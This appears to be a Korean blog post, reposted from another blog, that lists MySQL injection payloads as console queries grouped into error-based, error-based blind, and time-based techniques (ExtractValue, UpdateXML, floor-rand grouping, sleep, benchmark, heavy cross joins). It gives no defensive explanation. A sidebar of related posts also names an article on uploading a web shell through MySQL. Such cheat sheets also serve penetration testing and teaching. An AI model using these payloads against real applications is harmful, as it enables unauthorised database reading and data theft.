티스토리 뷰
출처 : http://hellsonic.tistory.com/entry/Error-Based-MYSQL-Injection
Error Based MYSQL Injection
mysql> select 1 from dual where 1=1 and row(1,1)>(select count(*),concat(version(),floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1);
|
mysql> select 1 from dual where 1=1 and ExtractValue(1,concat(0x01,version()));
|
mysql> select 1 from dual where 1=1 and UpdateXML(1,concat(0x01,version()),1);
|
Error Based Blind MYSQL Injection
mysql> select 1 from dual where 1=1 and 1=(select 1 union select 1 order by (select 1 from information_schema.tables where 1=1));
mysql> select 1 from dual where 1=1 and if(1=2,1,(select 1 union select 2)); ERROR 1242 (21000): Subquery returns more than 1 row
mysql> select 1 from dual where 1=1 and if(1=1,1,(select 1 union select 2)); +---+
mysql> select 1 from dual where 1=2 and (select 1 union select 2);
mysql> select 1 from dual where 1=1 and (select 1 union select 2); |
Time Based MYSQL Injection
SLEEP mysql> select 1 from dual where 1=1 and IF(1=1,sleep(3),0); mysql> select 1 from dual where 1=1 and IF(1=2,sleep(3),0);
BENCHMARK mysql> select 1 from dual where 1=1 and IF(1=1,benchmark(1000000,MD5(0)),1); mysql> select 1 from dual where 1=1 and IF(1=2,benchmark(1000000,MD5(0)),1);
HEAVY QUERY mysql> select 1 from dual where 1=1 and (select count(*) from information_schema.columns A,information_schema.columns A2,information_schema.columns A3); mysql> select 1 from dual where 1=2 and (select count(*) from information_schema.columns A,information_schema.columns A2,information_schema.columns A3); |
'기억하자정보' 카테고리의 다른 글
| 그누보드 g4s 글 내용에서 _blank 문제 (1) | 2013.08.01 |
|---|---|
| mysql에서 악의적인 스크립트(웹쉘) 업로드 하기 (0) | 2013.01.13 |
| UIWebView를 JavaScript로 제어하기 (0) | 2012.09.14 |
| iOS 리소스에 HTML파일을 읽어서 웹뷰 보이기 (0) | 2012.09.14 |
| 맥[mac] OS X Lion 에서 ftp 서버 활성화 (0) | 2012.08.06 |
- 안내
- 궁금한 점을 댓글로 남겨주시면 답변해 드립니다.
